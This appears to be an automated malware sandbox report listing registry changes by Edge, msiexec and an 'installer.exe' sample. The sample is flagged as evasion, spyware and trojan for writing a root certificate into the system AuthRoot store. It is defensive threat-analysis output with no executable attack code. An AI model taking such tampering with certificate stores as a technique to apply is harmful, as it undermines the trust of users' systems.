Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{17C107A8-D6F7-4A4E-97A3-D4D21B9EF9CC}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000009e0759a0e87ffbdb1003e9b9abb551c0c6e973947c6928ca4d96299adb0b7a0027b77c8d5391c89dc26e59212bf3d6c3bfd62266264e2132f157cd5f3439	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D0C95074-86AE-458D-BF1A-454A32E429DA} = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S}	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 80f6af82f440d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utopia-privacy.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 1b415271f240d701	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utopia-privacy.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e8e8816af240d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utopia-privacy.com\Total = "90"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000025ee353d55a8356643f437076e991ca97d0adc695aa3c554ba14416bdc0c16467641c12eaa4ff24bdc1f9964b3bae3a9d2c50c4d6411c36254eb00dfb72805bbc20c1857828bd54c568b21c238196f0464caaf2ad9a3c83b3a534453e091c75c9ff18e80697df6837ed7e46106d5403eb1b70185b07bf21cb3eb35c9aa6738ffc58f0ab07443826d67a433d68e0d757d192e0f5078b8e2fa3255c2ead5cade06ac867779f2fe8ce7f4926db920e39b66b2cdfa51057a39663030735dfedae27ca276dae729cfab7b8041626df875e2cea835e00f4ee184c0861bf924f3b778dc4cff63f30ed440fc9d5136a063e5463b1007684ed00cc8c153b89d14ca8149c065c12787942ec072076307d9da514f33c9e1431da21d9b49d4a5d953a558555b635caf18b5fd47574815851b55db3d5e4c65257913332287c28464eeb95c6fbf0a7039ce1962c1232408103ddfa17177ea3124777c6e606c39f4bd7791ad05f63b9dd434237bd32b32dc93543dc55a0a94e6820595edd070819424bf986bf1ec76834386c1690fc9c431bb30b365b1075b258739b6d287a9dc40ffe798f890609bb0e9a4cf28	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34ABEE = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
